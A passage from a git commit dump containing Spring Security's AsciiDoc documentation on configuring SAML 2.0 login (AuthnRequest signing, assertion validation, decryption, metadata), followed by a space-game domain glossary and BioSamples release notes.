\n@Bean\npublic RelyingPartyRegistrationRepository relyingPartyRegistrations() {\n RelyingPartyRegistration okta = addRelyingPartyDetails(\n RelyingPartyRegistration\n .fromMetadataLocation(oktaMetadataUrl)\n .registrationId(\"okta\")).build();\n\n RelyingPartyRegistration azure = addRelyingPartyDetails(\n RelyingPartyRegistration\n .fromMetadataLocation(azureMetadataUrl)\n .registrationId(\"azure\")).build();\n\n return new InMemoryRelyingPartyRegistrationRepository(okta, azure);\n}\n----\n\n[[servlet-saml2login-sp-initiated-factory]]\n=== Producing `<saml2:AuthnRequest>` s\n\nAs stated earlier, Spring Security's SAML 2.0 support produces a `<saml2:AuthnRequest>` to commence authentication with the asserting party.\n\nSpring Security achieves this in part by registering the `Saml2WebSsoAuthenticationRequestFilter` in the filter chain.\nBy default, this filter responds to the endpoint `+\/saml2\/authenticate\/{registrationId}+`.\n\nFor example, if you were deployed to `https:\/\/rp.example.com` and you gave your registration an ID of `okta`, you could navigate to:\n\n`https:\/\/rp.example.com\/saml2\/authenticate\/okta`\n\nand the result would be a redirect that included a `SAMLRequest` parameter containing the signed, deflated, and encoded `<saml2:AuthnRequest>`.\n\n[[servlet-saml2login-sp-initiated-factory-signing]]\n==== Changing How the `<saml2:AuthnRequest>` Gets Sent\n\nBy default, Spring Security signs each `<saml2:AuthnRequest>` and sends it as a GET to the asserting party.\n\nMany asserting parties don't require a signed `<saml2:AuthnRequest>`.\nThis can be configured automatically via `RelyingPartyRegistrations`, or you can supply it manually, like so:\n\n\n.Not Requiring Signed AuthnRequests\n====\n.Boot\n[source,yaml,role=\"primary\"]\n----\nspring:\n security:\n saml2:\n relyingparty:\n okta:\n identityprovider:\n entity-id: ...\n singlesignon.sign-request: false\n----\n\n.Java\n[source,java,role=\"secondary\"]\n----\nRelyingPartyRegistration relyingPartyRegistration = RelyingPartyRegistration.withRegistrationId(\"okta\")\n \/\/ ...\n .assertingPartyDetails(party -> party\n \/\/ ...\n .wantAuthnRequestsSigned(false)\n );\n----\n====\n\nOtherwise, you will need to specify a private key to `RelyingPartyRegistration#signingX509Credentials` so that Spring Security can sign the `<saml2:AuthnRequest>` before sending.\n\n[[servlet-saml2login-sp-initiated-factory-algorithm]]\nBy default, Spring Security will sign the `<saml2:AuthnRequest>` using `rsa-sha256`, though some asserting parties will require a different algorithm, as indicated in their metadata.\n\nYou can configure the algorithm based on the asserting party's <<servlet-saml2login-relyingpartyregistrationrepository,metadata using `RelyingPartyRegistrations`>>.\n\nOr, you can provide it manually:\n\n[source,java]\n----\nString metadataLocation = \"classpath:asserting-party-metadata.xml\";\nRelyingPartyRegistration relyingPartyRegistration = RelyingPartyRegistrations.fromMetadataLocation(metadataLocation)\n \/\/ ...\n .assertingPartyDetails((party) -> party\n \/\/ ...\n .signingAlgorithms((sign) -> sign.add(SignatureConstants.ALGO_ID_SIGNATURE_RSA_SHA512))\n );\n----\n\nNOTE: The snippet above uses the OpenSAML `SignatureConstants` class to supply the algorithm name.\nBut, that's just for convenience.\nSince the datatype is `String`, you can supply the name of the algorithm directly.\n\n[[servlet-saml2login-sp-initiated-factory-binding]]\nSome asserting parties require that the `<saml2:AuthnRequest>` be POSTed.\nThis can be configured automatically via `RelyingPartyRegistrations`, or you can supply it manually, like so:\n\n[source,java]\n----\nRelyingPartyRegistration relyingPartyRegistration = RelyingPartyRegistration.withRegistrationId(\"okta\")\n \/\/ ...\n .assertingPartyDetails(party -> party\n \/\/ ...\n .singleSignOnServiceBinding(Saml2MessageBinding.POST)\n );\n----\n\n\n[[servlet-saml2login-sp-initiated-factory-custom-authnrequest]]\n==== Customizing OpenSAML's `AuthnRequest` Instance\n\nThere are a number of reasons that you may want to adjust an `AuthnRequest`.\nFor example, you may want `ForceAuthN` to be set to `true`, which Spring Security sets to `false` by default.\n\nIf you don't need information from the `HttpServletRequest` to make your decision, then the easiest way is to <<servlet-saml2login-opensaml-customization,register a custom `AuthnRequestMarshaller` with OpenSAML>>.\nThis will give you access to post-process the `AuthnRequest` instance before it's serialized.\n
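For example, a rough sketch of that approach, assuming a Spring Security and OpenSAML version that expose `OpenSamlInitializationService` and `AuthnRequestMarshaller` (the exact hook points may differ in yours), could look like:\n\n[source,java]\n----\nstatic {\n\tOpenSamlInitializationService.requireInitialize((registry) -> {\n\t\tAuthnRequestMarshaller marshaller = new AuthnRequestMarshaller() {\n\t\t\t@Override\n\t\t\tpublic Element marshall(XMLObject object, Element element) throws MarshallingException {\n\t\t\t\t\/\/ post-process the AuthnRequest before it is serialized\n\t\t\t\t((AuthnRequest) object).setForceAuthn(true);\n\t\t\t\treturn super.marshall(object, element);\n\t\t\t}\n\t\t};\n\t\tregistry.getMarshallerFactory().registerMarshaller(AuthnRequest.DEFAULT_ELEMENT_NAME, marshaller);\n\t});\n}\n----\n\nDepending on which overload your version calls, the `marshall(XMLObject, Document)` variant may need the same treatment.\n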
`<saml2:AuthnRequest>` be POSTed.\nThis can be configured automatically via `RelyingPartyRegistrations`, or you can supply it manually, like so:\n\n[source,java]\n----\nRelyingPartyRegistration relyingPartyRegistration = RelyingPartyRegistration.withRegistrationId(\"okta\")\n \/\/ ...\n .assertingPartyDetails(party -> party\n \/\/ ...\n .singleSignOnServiceBinding(Saml2MessageType.POST)\n );\n----\n\n\n[[servlet-saml2login-sp-initiated-factory-custom-authnrequest]]\n==== Customizing OpenSAML's `AuthnRequest` Instance\n\nThere are a number of reasons that you may want to adjust an `AuthnRequest`.\nFor example, you may want `ForceAuthN` to be set to `true`, which Spring Security sets to `false` by default.\n\nIf you don't need information from the `HttpServletRequest` to make your decision, then the easiest way is to <<servlet-saml2login-opensaml-customization,register a custom `AuthnRequestMarshaller` with OpenSAML>>.\nThis will give you access to post-process the `AuthnRequest` instance before it's serialized.\n\nBut, if you do need something from the request, then you can use create a custom `Saml2AuthenticationRequestContext` implementation and then a `Converter<Saml2AuthenticationRequestContext, AuthnRequest>` to build an `AuthnRequest` yourself, like so:\n\n[source,java]\n----\n@Component\npublic class AuthnRequestConverter implements\n Converter<MySaml2AuthenticationRequestContext, AuthnRequest> {\n\n\tprivate final AuthnRequestBuilder authnRequestBuilder;\n\tprivate final IssuerBuilder issuerBuilder;\n\n\t\/\/ ... constructor\n\n\tpublic AuthnRequest convert(Saml2AuthenticationRequestContext context) {\n\t\tMySaml2AuthenticationRequestContext myContext = (MySaml2AuthenticationRequestContext) context;\n\t\tIssuer issuer = issuerBuilder.buildObject();\n\t\tissuer.setValue(myContext.getIssuer());\n\n\t\tAuthnRequest authnRequest = authnRequestBuilder.buildObject();\n\t\tauthnRequest.setIssuer(iss);\n authnRequest.setDestination(myContext.getDestination());\n\t\tauthnRequest.setAssertionConsumerServiceURL(myContext.getAssertionConsumerServiceUrl());\n\n\t\t\/\/ ... additional settings\n\n\t\tauthRequest.setForceAuthn(myContext.getForceAuthn());\n\t\treturn authnRequest;\n\t}\n}\n----\n\nThen, you can construct your own `Saml2AuthenticationRequestContextResolver` and `Saml2AuthenticationRequestFactory` and publish them as `@Bean` s:\n\n[source,java]\n----\n@Bean\nSaml2AuthenticationRequestContextResolver authenticationRequestContextResolver() {\n\tSaml2AuthenticationRequestContextResolver resolver =\n new DefaultSaml2AuthenticationRequestContextResolver();\n\treturn request -> {\n Saml2AuthenticationRequestContext context = resolver.resolve(request);\n return new MySaml2AuthenticationRequestContext(context, request.getParameter(\"force\") != null);\n\t};\n}\n\n@Bean\nSaml2AuthenticationRequestFactory authenticationRequestFactory(\n\t\tAuthnRequestConverter authnRequestConverter) {\n\n\tOpenSamlAuthenticationRequestFactory authenticationRequestFactory =\n new OpenSamlAuthenticationRequestFactory();\n\tauthenticationRequestFactory.setAuthenticationRequestContextConverter(authnRequestConverter);\n\treturn authenticationRequestFactory;\n}\n----\n\n[[servlet-saml2login-authenticate-responses]]\n=== Authenticating `<saml2:Response>` s\n\nTo verify SAML 2.0 Responses, Spring Security uses <<servlet-saml2login-architecture,`OpenSamlAuthenticationProvider`>> by default.\n\nYou can configure this in a number of ways including:\n\n1. Setting a clock skew to timestamp validation\n2. 
2. Mapping the response to a list of `GrantedAuthority` instances\n3. Customizing the strategy for validating assertions\n4. Customizing the strategy for decrypting response and assertion elements\n\nTo configure these, you'll use the `saml2Login#authenticationManager` method in the DSL.\n\n[[servlet-saml2login-opensamlauthenticationprovider-clockskew]]\n==== Setting a Clock Skew\n\nIt's not uncommon for the asserting and relying parties to have system clocks that aren't perfectly synchronized.\nFor that reason, you can configure `OpenSamlAuthenticationProvider` 's default assertion validator with some tolerance:\n\n[source,java]\n----\n@EnableWebSecurity\npublic class SecurityConfig extends WebSecurityConfigurerAdapter {\n\n @Override\n protected void configure(HttpSecurity http) throws Exception {\n OpenSamlAuthenticationProvider authenticationProvider = new OpenSamlAuthenticationProvider();\n authenticationProvider.setAssertionValidator(OpenSamlAuthenticationProvider\n .createDefaultAssertionValidator(assertionToken -> {\n \t\t\tMap<String, Object> params = new HashMap<>();\n \t\t\tparams.put(CLOCK_SKEW, Duration.ofMinutes(10).toMillis());\n \t\t\t\/\/ ... other validation parameters\n \t\t\treturn new ValidationContext(params);\n \t\t})\n );\n\n http\n .authorizeRequests(authz -> authz\n .anyRequest().authenticated()\n )\n .saml2Login(saml2 -> saml2\n .authenticationManager(new ProviderManager(authenticationProvider))\n );\n }\n}\n----\n\n[[servlet-saml2login-opensamlauthenticationprovider-userdetailsservice]]\n==== Coordinating with a `UserDetailsService`\n\nOr, perhaps you would like to include user details from a legacy `UserDetailsService`.\nIn that case, the response authentication converter can come in handy, as can be seen below:\n\n[source,java]\n----\n@EnableWebSecurity\npublic class SecurityConfig extends WebSecurityConfigurerAdapter {\n @Autowired\n UserDetailsService userDetailsService;\n\n @Override\n protected void configure(HttpSecurity http) throws Exception {\n OpenSamlAuthenticationProvider authenticationProvider = new OpenSamlAuthenticationProvider();\n authenticationProvider.setResponseAuthenticationConverter(responseToken -> {\n \tSaml2Authentication authentication = OpenSamlAuthenticationProvider\n .createDefaultResponseAuthenticationConverter() <1>\n .convert(responseToken);\n \tAssertion assertion = responseToken.getResponse().getAssertions().get(0);\n String username = assertion.getSubject().getNameID().getValue();\n UserDetails userDetails = this.userDetailsService.loadUserByUsername(username); <2>\n return new MySaml2Authentication(userDetails, authentication); <3>\n });\n\n http\n .authorizeRequests(authz -> authz\n .anyRequest().authenticated()\n )\n .saml2Login(saml2 -> saml2\n .authenticationManager(new ProviderManager(authenticationProvider))\n );\n }\n}\n----\n<1> First, call the default converter, which extracts attributes and authorities from the response\n<2> Second, call the <<servlet-authentication-userdetailsservice, `UserDetailsService`>> using the relevant information\n<3> Third, return a custom authentication that includes the user details\n\n[NOTE]\nIt's not required to call `OpenSamlAuthenticationProvider` 's default authentication converter.\nIt returns a `Saml2AuthenticatedPrincipal` containing the attributes it extracted from `AttributeStatement` s as well as the single `ROLE_USER` authority.\n\n[[servlet-saml2login-opensamlauthenticationprovider-additionalvalidation]]\n==== Performing Additional Validation\n
\n`OpenSamlAuthenticationProvider` performs minimal validation on SAML 2.0 Assertions.\nAfter verifying the signature, it will:\n\n1. Validate `<AudienceRestriction>` and `<DelegationRestriction>` conditions\n2. Validate `<SubjectConfirmation>` s, except for any IP address information\n\nTo perform additional validation, you can configure your own assertion validator that delegates to `OpenSamlAuthenticationProvider` 's default and then performs its own.\n\n[[servlet-saml2login-opensamlauthenticationprovider-onetimeuse]]\nFor example, you can use OpenSAML's `OneTimeUseConditionValidator` to also validate a `<OneTimeUse>` condition, like so:\n\n[source,java]\n----\nOpenSamlAuthenticationProvider provider = new OpenSamlAuthenticationProvider();\nOneTimeUseConditionValidator validator = ...;\nprovider.setAssertionValidator(assertionToken -> {\n Saml2ResponseValidatorResult result = OpenSamlAuthenticationProvider\n .createDefaultAssertionValidator()\n .convert(assertionToken);\n Assertion assertion = assertionToken.getAssertion();\n OneTimeUse oneTimeUse = assertion.getConditions().getOneTimeUse();\n ValidationContext context = new ValidationContext();\n try {\n \tif (validator.validate(oneTimeUse, assertion, context) == ValidationResult.VALID) {\n \t\treturn result;\n \t}\n } catch (Exception e) {\n \treturn result.concat(new Saml2Error(INVALID_ASSERTION, e.getMessage()));\n }\n return result.concat(new Saml2Error(INVALID_ASSERTION, context.getValidationFailureMessage()));\n});\n----\n\n[NOTE]\nWhile recommended, it's not necessary to call `OpenSamlAuthenticationProvider` 's default assertion validator.\nA circumstance where you would skip it would be if you don't need it to check the `<AudienceRestriction>` or the `<SubjectConfirmation>` since you are doing those yourself.\n\n[[servlet-saml2login-opensamlauthenticationprovider-decryption]]\n==== Customizing Decryption\n\nSpring Security decrypts `<saml2:EncryptedAssertion>`, `<saml2:EncryptedAttribute>`, and `<saml2:EncryptedID>` elements automatically by using the decryption <<servlet-saml2login-rpr-credentials,`Saml2X509Credential` instances>> registered in the <<servlet-saml2login-relyingpartyregistration,`RelyingPartyRegistration`>>.\n\n`OpenSamlAuthenticationProvider` exposes <<servlet-saml2login-architecture,two decryption strategies>>.\nThe response decrypter is for decrypting encrypted elements of the `<saml2:Response>`, like `<saml2:EncryptedAssertion>`.\nThe assertion decrypter is for decrypting encrypted elements of the `<saml2:Assertion>`, like `<saml2:EncryptedAttribute>` and `<saml2:EncryptedID>`.\n\nYou can replace `OpenSamlAuthenticationProvider`'s default decryption strategy with your own.\nFor example, if you have a separate service that decrypts the assertions in a `<saml2:Response>`, you can use it instead like so:\n\n[source,java]\n----\nMyDecryptionService decryptionService = ...;\nOpenSamlAuthenticationProvider provider = new OpenSamlAuthenticationProvider();\nprovider.setResponseElementsDecrypter((responseToken) -> decryptionService.decrypt(responseToken.getResponse()));\n----\n\nIf you are also decrypting individual elements in a `<saml2:Assertion>`, you can customize the assertion decrypter, too:\n\n[source,java]\n----\nprovider.setAssertionElementsDecrypter((assertionToken) -> decryptionService.decrypt(assertionToken.getAssertion()));\n----\n\nNOTE: There are two separate decrypters since assertions can be signed separately from responses.\nTrying to decrypt a signed assertion's elements before signature verification may invalidate the signature.\n
If your asserting party signs the response only, then it's safe to decrypt all elements using only the response decrypter.\n\n[[servlet-saml2login-authenticationmanager-custom]]\n==== Using a Custom Authentication Manager\n\n[[servlet-saml2login-opensamlauthenticationprovider-authenticationmanager]]\nOf course, the `authenticationManager` DSL method can also be used to perform a completely custom SAML 2.0 authentication.\nThis authentication manager should expect a `Saml2AuthenticationToken` object containing the SAML 2.0 Response XML data.\n\n[source,java]\n----\n@EnableWebSecurity\npublic class SecurityConfig extends WebSecurityConfigurerAdapter {\n\n @Override\n protected void configure(HttpSecurity http) throws Exception {\n AuthenticationManager authenticationManager = new MySaml2AuthenticationManager(...);\n http\n .authorizeRequests(authorize -> authorize\n .anyRequest().authenticated()\n )\n .saml2Login(saml2 -> saml2\n .authenticationManager(authenticationManager)\n )\n ;\n }\n}\n----\n\n[[servlet-saml2login-authenticatedprincipal]]\n=== Using `Saml2AuthenticatedPrincipal`\n\nWith the relying party correctly configured for a given asserting party, it's ready to accept assertions.\nOnce the relying party validates an assertion, the result is a `Saml2Authentication` with a `Saml2AuthenticatedPrincipal`.\n\nThis means that you can access the principal in your controller like so:\n\n[source,java]\n----\n@Controller\npublic class MainController {\n\t@GetMapping(\"\/\")\n\tpublic String index(@AuthenticationPrincipal Saml2AuthenticatedPrincipal principal, Model model) {\n\t\tString email = principal.getFirstAttribute(\"email\");\n\t\tmodel.addAttribute(\"email\", email);\n\t\treturn \"index\";\n\t}\n}\n----\n\n[TIP]\nBecause the SAML 2.0 specification allows for each attribute to have multiple values, you can either call `getAttribute` to get the list of attributes or `getFirstAttribute` to get the first in the list.\n`getFirstAttribute` is quite handy when you know that there is only one value.\n\n[[servlet-saml2login-metadata]]\n=== Producing `<saml2:SPSSODescriptor>` Metadata\n\nYou can publish a metadata endpoint by adding the `Saml2MetadataFilter` to the filter chain, as you'll see below:\n\n[source,java]\n----\nConverter<HttpServletRequest, RelyingPartyRegistration> relyingPartyRegistrationResolver =\n new DefaultRelyingPartyRegistrationResolver(this.relyingPartyRegistrationRepository);\nSaml2MetadataFilter filter = new Saml2MetadataFilter(\n\t\trelyingPartyRegistrationResolver,\n new OpenSamlMetadataResolver());\n\nhttp\n \/\/ ...\n .saml2Login(withDefaults())\n .addFilterBefore(filter, Saml2WebSsoAuthenticationFilter.class);\n----\n\nYou can use this metadata endpoint to register your relying party with your asserting party.\nThis is often as simple as finding the correct form field to supply the metadata endpoint.\n\nBy default, the metadata endpoint is `+\/saml2\/service-provider-metadata\/{registrationId}+`.\nYou can change this by calling the `setRequestMatcher` method on the filter:\n\n[source,java]\n----\nfilter.setRequestMatcher(new AntPathRequestMatcher(\"\/saml2\/metadata\/{registrationId}\", \"GET\"));\n----\n\nensuring that the `registrationId` hint is at the end of the path.\n\nOr, if you have registered a custom relying party registration resolver in the constructor, then you can specify a path without a `registrationId` hint, like so:\n\n[source,java]\n----\nfilter.setRequestMatcher(new AntPathRequestMatcher(\"\/saml2\/metadata\", \"GET\"));\n
\"GET\"));\n----\n\n[[servlet-saml2login-logout]]\n=== Performing Single Logout\n\nSpring Security does not yet support single logout.\n\nGenerally speaking, though, you can achieve this by creating and registering a custom `LogoutSuccessHandler` and `RequestMatcher`:\n\n[source,java]\n----\nhttp\n \/\/ ...\n .logout(logout -> logout\n .logoutSuccessHandler(myCustomSuccessHandler())\n .logoutRequestMatcher(myRequestMatcher())\n )\n----\n\nThe success handler will send logout requests to the asserting party.\n\nThe request matcher will detect logout requests from the asserting party.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2c2f3c8f83ffa4787002d8d101ce7223b5f56d3d","subject":"Update ddd-glossary.asciidoc","message":"Update ddd-glossary.asciidoc","repos":"janScheible\/rising-empire,janScheible\/rising-empire,janScheible\/rising-empire,janScheible\/rising-empire","old_file":"doc\/ddd-glossary.asciidoc","new_file":"doc\/ddd-glossary.asciidoc","new_contents":".Table Glossary\n[cols=\"a,a,a,a\",width=\"100%\"]\n|===\n| Term | Description | Supertype (is-a) | Relations (has-a)\n\n| universe\n| The sandbox for history to take place.\n| -\n| \n* nation{+}\n* star{+}\n* fleet{*}\n\n| nation\n| The organizational structure that allows individuals to act as a group. \n| - \n| \n* species{1}\n* leader{1}\n\n| species \n| A group of organisms being on the cusp to the stars.\n| -\n| -\n\n| leader \n| A single individual massively influencing the actions of a species. Might be some kind of emperor or elected sovereign.\n| -\n| -\n\n| star\n| \"A star is a luminous sphere of plasma held together by its own gravity. The nearest star to Earth is the Sun.\" https:\/\/en.wikipedia.org\/wiki\/Star[(Wikipedia)]\n| - \n| \n* spectral class{1}\n* planetary characteristics{1}\n* colony{0..1}\n* fleet{*}\n\n| spectral class \n| \n* O and B (blue)\n* A (white)\n* F (green)\n* G (yellow)\n* K (orange)\n* M (red)\n\nAccording to the http:\/\/www.meixnerobservatorium.at\/astronomie-allgemein-astronomy-popular\/hertzsprung-russel-diagramm\/[Hertzsprung\u2013Russell diagram] F should rather be white\/yellow instead of green. The spectral class of a star influences what kind of planets might orbiting it. Stars of class G and partially F and K have the highest likelihood for earth like planets.\n| -\n| -\n\n| planetary characteristics\n| Summarizes the overall characteristics of a solar system's planets. That means individual planets are not taken into account but rather an average value. The characteristics include e.g. environment, specials and size.\n| -\n|\n* environment{1}\n* specials{*}\n* (size)\n\n| environment \n| Terran, Jungle, Ocean, Arid, Steppe, Desert, Minimal, Barren, Tundra, Dead, Inferno, Toxic, Radiated\n| -\n| -\n\n| special\n| Mineral Poor, Ultra Poor, Artifact, Mineral Rich, Ultra Rich, Hostile, Fertile, Gaia\n| -\n| -\n\n| colony \n| \"A colony is a territory under the immediate political control of a geographically distant state.\" https:\/\/en.wikipedia.org\/wiki\/Colony_(disambiguation)[(Wikipedia)] \n| - \n| \n* nation{1}\n* total production{1}\n* scan radius{1}\n\n| fleet\n| A group of ships commanded by a nation. Is either orbiting a star or traveling through deep space. \n| - \n|\n* nation{1}\n* ship{+}\n* star{0..1}\n\n| ship\n| A single space vessel. 
| A single space vessel. The type is either:\n\n* scout (speed = 0.5, scan radius = 0.5)\n* fighter (speed = 0.4, scan radius = 0.25)\n* colony ship (speed = 0.25, scan radius = 0.5)\n| -\n|\n* type\n* scan radius{1}\n* speed [parsecs\/turn]\n\n|=== \n","old_contents":".Table Glossary\n[cols=\"a,a,a,a\",width=\"100%\"]\n|===\n| Term | Description | Supertype (is-a) | Relations (has-a)\n\n| universe\n| The sandbox for history to take place.\n| -\n| \n* nation{+}\n* star{+}\n* fleet{*}\n\n| nation\n| The organizational structure that allows individuals to act as a group. \n| - \n| \n* species{1}\n* leader{1}\n\n| species \n| A group of organisms being on the cusp to the stars.\n| -\n| -\n\n| leader \n| A single individual massively influencing the actions of a species. Might be some kind of emperor or elected sovereign.\n| -\n| -\n\n| star\n| \"A star is a luminous sphere of plasma held together by its own gravity. The nearest star to Earth is the Sun.\" https:\/\/en.wikipedia.org\/wiki\/Star[(Wikipedia)]\n| - \n| \n* spectral class{1}\n* planetary characteristics{1}\n* fleet{*}\n\n| spectral class \n| \n* O and B (blue)\n* A (white)\n* F (green)\n* G (yellow)\n* K (orange)\n* M (red)\n\nAccording to the http:\/\/www.meixnerobservatorium.at\/astronomie-allgemein-astronomy-popular\/hertzsprung-russel-diagramm\/[Hertzsprung\u2013Russell diagram] F should rather be white\/yellow instead of green. The spectral class of a star influences what kind of planets might orbiting it. Stars of class G and partially F and K have the highest likelihood for earth like planets.\n| -\n| -\n\n| planetary characteristics\n| Summarizes the overall characteristics of a star system's planets. That means individual planets are not taken into account but rather a average value. The characteristics include e.g.: planetary environment, planetary specials and planetary size.\n| -\n|\n* planetary environment{1}\n* planetary specials{*}\n\n| planetary environment \n| \n* Terran\n* Jungle\n* Ocean\n* Arid\n* Steppe\n* Desert\n* Minimal\n* Barren\n* Tundra\n* Dead \n* Inferno\n* Toxic\n* Radiated\n| -\n| -\n\n| planetary special\n| \n* Mineral Poor\n* Ultra Poor\n* Artifact\n* Mineral Rich\n* Ultra Rich\n* Hostile\n* Fertile\n* Gaia\n| -\n| -\n\n| colony \n| \"A colony is a territory under the immediate political control of a geographically distant state.\" https:\/\/en.wikipedia.org\/wiki\/Colony_(disambiguation)[(Wikipedia)] \n| - \n| \n* star{1}\n* nation{1}\n* total production{1}\n* production ratios{1}\n\n| fleet\n| A group of ships commanded by a nation. Is either orbiting a star or traveling through deep space. \n| - \n|\n* nation{1}\n* ship{+}\n* star{0..1}\n\n| ship\n| A single space vessel.\n| -\n| -\n\n|=== \n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"8367e89c52225d14cdf5d299a3fb9c367936e825","subject":"Prepare for release version 4.1.4","message":"Prepare for release version 4.1.4\n","repos":"EBIBioSamples\/biosamples-v4,EBIBioSamples\/biosamples-v4,EBIBioSamples\/biosamples-v4,EBIBioSamples\/biosamples-v4","old_file":"RELEASE.adoc","new_file":"RELEASE.adoc","new_contents":"= [.ebi-color]#Release notes#\n:toc: auto\n
\nThis page contains links to release notes for BioSamples for version 4.0.0 and higher. This release represents a comprehensive overhaul and therefore previous release notes are no longer applicable.\n\n[[section]]\n4.1.4\n----\n\n* As part of the curation pipeline, attributes with the value \"not_applicable\" are removed\n* Date titles on the sample page are now \"Releases on\" and \"Updated on\" rather than \"Release\" and \"Update\"\n* An initial accession endpoint has been added to the REST API to enable ENA to get a list of accessions for a project\n* A multi-step Docker build has been added to allow Docker images to be distributed on quay.io\n* A fix has been made for an issue that caused the Zooma Pipeline to fail on wwwdev\n\n\n[[section]]\n4.1.3\n----\n\n* Additional sample attributes required by ENA are now available including a single, top-level taxId field\n* The export box for a sample is now renamed \"Download\" and contains a list of serialisations that always download as a file, fixing a blocked popups issue in Safari\n* The search results now have an updated look and feel based on feedback from ENA\n\n\n[[section]]\n4.1.2\n----\n\n* Sample JSON now contains a numeric taxId field at the top level\n* IRI of ontology terms now resolve to the defining ontology when they are available in multiple ontologies\n* Requests for a sample now contain a computed ETag header to identify changes\n* When requesting a private sample an explanation message is now provided in addition to the 403 error code\n* The search UI now contains a clear filters button\n\n\n[[section]]\n4.1.1\n----\n\n* Expose the BioSchemas markup with enhanced context and Sample ontology code\n* SampleTab submission pipeline has been rewritten for better robustness\n* In the samples results page, the sample name and the sample accession are now linking to the single sample page\n* Fixed various broken hyperlinks on the home page and in documentation\n\n\n[[section]]\n4.1.0\n----\n\n### New features\n\n* GDPR:\n** SampleTab submissions enforce explicit acceptance of the terms of service and the privacy information\n** GDPR notices added throughout\n* SampleTab where targets of relationships are neither sample name nor sample accession are now rejected, providing the user additional information on the problematic data\n* *Bioschema.org* entities are exported in BioSamples and available both in the UI - embedded in a script tag - and through the API\n\n### Bug fixes\n* Solved issues with wrong header\u2019s hyperlinks\n* Solved issue with resolving relationship by name in SampleTab submissions\n* Solved issue with converting DatabaseURI to external references in SampleTab submissions\n* Improved special characters handling in SampleTab submissions\n\n\n[[section]]\n4.0.7\n-----\n\nThis is a bugfix release that addresses the following issues:\n\n* GDPR notices\n* Update format of the Sitemap file\n\n[[section]]\n4.0.6\n-----\n\nThis is a bugfix release that addresses the following issues:\n\n* Improves search handling of special characters in facets\n* Improves search handling of special characters in search terms\n* Fix issue with curation link URLs\n* Implemented DataCatalog, Dataset and DataRecord profiles on JSON+LD\n* Add ability to control which curation domains are applied to a sample\n* Updated and improved API documentation\n* Updated and improved SampleTab documentation\n* Fix links to XML and JSON serialisation in the UI\n* Fix bug in handling special characters in SampleTab submission\n* Add export pipeline\n* Add copy down pipeline\n\n[[section]]\n4.0.5\n-----\n\nThis is a bugfix release that addresses the following issues:\n\n* Improved consistency of paged search results if any of the samples are added or modified whilst paging\n* Improved search update throughput by using Solr transaction log \n* Updated JSON+LD format to the latest version\n* Correctly accept XML sample groups and their related samples\n* Fix issue related to search query terms not being applied to legacy XML and legacy JSON endpoints.\n* Fix incorrect HAL links on autocomplete endpoint\n* Replace SampleTab submitted relationships by name with accessions. 
following issues:\n\n* Improved consistency of paged search results if any of the samples are added or modified whilst paging\n* Improved search update throughput by using Solr transaction log \n* Updated JSON+LD format to the latest version\n* Correctly accept XML sample groups and their related samples\n* Fix issue related to search query terms not being applied to legacy XML and legacy JSON endpoints.\n* Fix incorrect HAL links on autocomplete endpoint\n* Replace SampleTab submitted relationships by name with accessions. As a consequence, they can now be consistently cross referenced by accession in user interface and API\n* Improved indexing of samples when they are rapidly updated or curated\n* Updated Elixir Deposition Database banner URL\n* Reduce number of Zooma calls by not attempting to map \"unknown\" or \"other\" attributes\n* Reduce load on OLS by ensuring Zooma does not requery OLS as any results from OLS would not be used by BioSamples\n\n[[section]]\n4.0.4\n-----\n\nThis is a bugfix release that addresses the following issues:\n\n* Persistence of search terms and filters when using HAL paging links\n* SameAs relation in the legacy JSON API works as intended\n* Removed residual test endpoints from legacy JSON API\n* Details relation in legacy JSON API now correctly resolves\n* Added informative and specific title to webpages\n* Added https:\/\/www.elixir-europe.org\/platforms\/data\/elixir-deposition-databases[Elixir Deposition Database] banner \n\n[[section]]\n4.0.3\n-----\n\nThis is a bugfix release that addresses the following issues:\n\n* Forward legacy group URLs \/biosamples\/groups\/SAMEGxxxx to \/biosamples\/samples\/SAMEGxxxxx\n* Missing or malformed update and release date on legacy XML group submission will default to current datetime. It is not recommended that users intentionally rely on this.\n* Index legacy XML group submissions, which was not happening due to an unexpected consequence of the interaction of components. \n* Redirect \/biosamples\/sample and \/biosamples\/group URLs in case of typo \n\n[[section]]\n4.0.2\n-----\n\nThis is a bugfix release that addresses the following issues:\n\n* Fix javascript on SampleTab submission and accession\n* Handle load-balanced accessioning\n* Fix for storage of relationships source on new samples\n\n[[section]]\n4.0.1\n-----\n\nThis is a bugfix release that addresses the following issues:\n\n* Fix submission of new unaccessioned samples with relationships by inserting an assigned accession into the source of any relationships that are missing it. \n* Fix curation pipeline of numeric organism iri to \"http:\/\/purl.obolibrary.org\/obo\/NCBITaxon_+taxId\" when it should be \"http:\/\/purl.obolibrary.org\/obo\/NCBITaxon_\"+taxId e.g. http:\/\/purl.obolibrary.org\/obo\/NCBITaxon_9606\n* Allow CORS requests for legacy XML APIs.\n* Updated homepage project sample links to use a filter search rather than a text search.\n\n[[section]]\n4.0.0\n-----\n\nVersion v4.0.0 represents a re-architecture and re-engineering of the\nBioSamples software stack. It is now based on the Java\nhttps:\/\/projects.spring.io\/spring-boot[Spring-Boot] framework, utilising\nhttps:\/\/www.mongodb.com[MongoDB] for storage and\nhttps:\/\/lucene.apache.org\/solr[Solr] for indexing and search. It tries\nto follow up-to-date web standards and conventions, while remaining\nbackwards compatible. 
This will also give us a strong and stable\nfoundation to build more features and improvements from, more reliably\nand more rapidly.\n\nHighlights include:\n\n* Submissions and updates will be available immediately via accession,\nand will be available via search within a few minutes or less. There is\nalso improved handling of submissions and updates, with fewer errors and\nbetter feedback about any problems.\n* Integration with https:\/\/aap.tsi.ebi.ac.uk[EBI AAP] for login\nmanagement and access to pre-publication samples, including use of\nhttps:\/\/www.elixir-europe.org\/services\/compute\/aai[ELIXIR AAI] single\nsign-on accounts.\n* Separation of submitted sample information from curation of that\ninformation, including the ability for 3rd party (re-)curation of\nsamples. Please contact us if you would be interested in more\ninformation and\/or to supply curation information.\n* Improved handling of non-alphanumeric characters in attribute types\ne.g. \"geographic location (country and\/or sea)\"\n* Improved faceting allowing selection of multiple values within same\nfacet, fixed re-use and re-distribution of search URLs. This will be\nexpanded in future with additional facet types where appropriate.\n* Support and recommend the use\nof\u00a0https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Content_negotiation[content\nnegotiation] for accessing multiple formats at the same URIs. In addition\nto the content (HTML vs XML vs JSON) this also 